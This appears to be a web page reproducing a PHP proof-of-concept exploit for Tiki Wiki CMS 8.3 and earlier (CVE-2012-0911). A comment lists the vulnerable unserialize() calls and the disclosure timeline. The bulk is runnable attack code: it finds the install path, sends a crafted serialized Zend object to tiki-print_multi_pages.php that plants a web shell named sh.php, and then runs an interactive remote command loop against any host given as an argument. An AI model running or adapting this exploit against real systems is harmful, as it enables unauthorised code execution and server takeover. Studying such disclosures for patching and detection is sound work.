扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 |
<?php /* ----------------------------------------------------------------- Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution ----------------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13s[at]gmail[dot]com software link....: http://info.tiki.org/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only.| | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerable code in different locations: lib/banners/bannerlib.php:28: $views = unserialize($_COOKIE[$cookieName]); lib/banners/bannerlib.php:136:$views = unserialize($_COOKIE[$cookieName]); tiki-print_multi_pages.php:19:$printpages = unserialize(urldecode($_REQUEST['printpages'])); tiki-print_multi_pages.php:24:$printstructures = unserialize(urldecode($_REQUEST['printstructures'])); tiki-print_pages.php:31:$printpages = unserialize(urldecode($_REQUEST["printpages"])); tiki-print_pages.php:32:$printstructures = unserialize(urldecode($_REQUEST['printstructures'])); tiki-send_objects.php:42: $sendpages = unserialize(urldecode($_REQUEST['sendpages'])); tiki-send_objects.php:48: $sendstructures = unserialize(urldecode($_REQUEST['sendstructures'])); tiki-send_objects.php:54: $sendarticles = unserialize(urldecode($_REQUEST['sendarticles'])); The vulnerability is caused due to all these scripts using "unserialize()" with user controlled input. This can lead to execution of arbitrary PHP code passing anad-hoc Zend Framework serializedobject. [-] Full path disclosure at: http://[host]/[path]/admin/include_calendar.php http://[host]/[path]/tiki-rss_error.php http://[host]/[path]/tiki-watershed_service.php [-] Disclosure timeline: [11/01/2012] - Vulnerability discovered [14/01/2012] - Issue reported to security(at)tikiwiki.org [14/01/2012] - New ticket opened: http://dev.tiki.org/item4109 [23/01/2012] - CVE number requested [23/01/2012] - Assigned CVE-2012-0911 [01/05/2012] - Version 8.4 released: http://info.tiki.org/article191-Tiki-Releases-8-4 [04/07/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } function get_path() { global $host, $path; $packet= "GET {$path}tiki-rss_error.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) die("\n[-] Path not found!\n"); return $m[1]; } print "\n+----------------------------------------------------------------------+"; print "\n| Tiki Wiki CMS Groupware <= 8.3 Remote Code Execution Exploit by EgiX |"; print "\n+----------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /tiki/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $f_path = get_path(); print "\n[-] Path disclosure: {$f_path}\n"; class Zend_Search_Lucene_Index_FieldInfo { public $name = '<?php error_reporting(0); print(___); passthru(base64_decode($_SERVER[HTTP_CMD])); die; ?>'; } class Zend_Search_Lucene_Storage_Directory_Filesystem { protected $_dirPath = null; public function __construct($path) { $this->_dirPath = $path; } } interface Zend_Pdf_ElementFactory_Interface {} class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface { protected $_docCount = 1; protected $_name = 'foo'; protected $_directory; protected $_fields; protected $_files; public function __construct($directory, $fields) { $this->_directory = $directory; $this->_fields= array($fields); $this->_files = new stdClass; } } class Zend_Pdf_ElementFactory_Proxy { private $_factory; public function __construct(Zend_Pdf_ElementFactory_Interface $factory) { $this->_factory = $factory; } } // http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf $directory = new Zend_Search_Lucene_Storage_Directory_Filesystem($f_path."sh.php\0"); $__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo); $____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory); $payload = urlencode(serialize($____proxy)); $payload = str_replace('%00', '%2500', $payload); $payload = "printpages={$payload}"; $packet= "POST {$path}tiki-print_multi_pages.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (preg_match('/multiprint/', http_send($host, $packet))) die("[-] Multi-print feature disabled!\n"); $packet= "GET {$path}sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\ntiki-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } |
体验盒子
